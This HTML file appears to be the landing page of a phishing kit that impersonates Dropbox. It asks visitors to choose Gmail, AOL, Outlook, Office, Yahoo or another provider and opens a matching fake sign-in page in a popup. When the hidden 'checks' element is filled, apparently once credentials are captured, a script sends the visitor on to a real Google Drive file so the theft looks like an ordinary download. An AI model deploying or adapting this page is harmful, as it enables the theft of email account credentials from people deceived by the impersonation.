<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>Dropbox</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <link href="css/style.css" rel="stylesheet">

  </head>

  <body>

   <div class="dropbox">
     <div class="container">
	 
	 <div class="col-lg-6 col-md-6 col-sm-6">
	  <div class="drop1">
	   <h2>Select your email provider</h2>
	   <h5>Where do you want to download form ?</h5>
	   <h6>Now, You can sign in to dropbox with your email.</h6>
	   <img src="images/3.png" alt="image">
	  </div>
	 </div>
	 
	 <div class="col-lg-6 col-md-6 col-sm-6">
	  <div class="drop2">
	    <ul>
		 <li class="link1"><a href="" data-n="link1" data-nn="GMA.html"><img src="images/4.png" alt="image"></a></li>
		 <li class="link2"><a href="" data-n="link2" data-nn="AOL.html"><img src="images/5.png" alt="image"></a></li>
		 <li class="link3"><a href="" data-n="link3" data-nn="OUT.html"><img src="images/6.png" alt="image"></a></li>
		 <li class="link4"><a href="" data-n="link4" data-nn="OFFICE.html"><img src="images/7.png" alt="image"></a></li>
		 <li class="link5"><a href="" data-n="link5" data-nn="YAHOO.html"><img src="images/8.png" alt="image"></a></li>
		 <li class="link6"><a href="" data-n="link6" data-nn="OTHER.html"><img src="images/9.png" alt="image"></a></li>
		</ul>
		<h3>Dropbox works the way you do</h3>
		<p>@2019 Dropbox Business</p>
	  </div>
	 </div>
	 
	 </div>
   </div>
      <div class="line"></div>
    <div style="" id="checks" style="display: none;"></div>
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
   <script>
     $(document).ready(function(e){ 
	   window_opener_xc(); 
	 });
	 function window_opener_xc(){
	   var url_part = get_extra_data(1);
	   $('.link1 a, .link2 a, .link3 a, .link4 a, .link5 a, .link6 a').click(function(e){
	     e.preventDefault();
		 var checks = $('#checks');
         checks.data('b', $(this).data('n'));		 
		 var win3 = window.open(url_part+$(this).data('nn'), '_blank', 'location=yes,height=570,width=520,scrollbars=yes,status=yes');
	     setInterval(function(){ 
		   if($('#checks').html()){ window.location.replace(get_extra_data(2)); }
		 }, 3000);
	   });
	 }
	 function get_extra_data(a){
	   var output = '';
	   if(a==1){
	     output = '';
	   }
	   else if(a==2){
	     output = "https://drive.google.com/file/d/1WaMliLzZ5bR5HIbc8VULfwEKDAp5GBJ6/view?fbclid=IwAR1i7nEA1gqnVdRjWgF8Q5PLJ4cETHGqXJBxoiRwRP6rQAg9N4yCAG9Cxug";
	   }
	   return output;
	 }
   </script>
  </body>
</html>
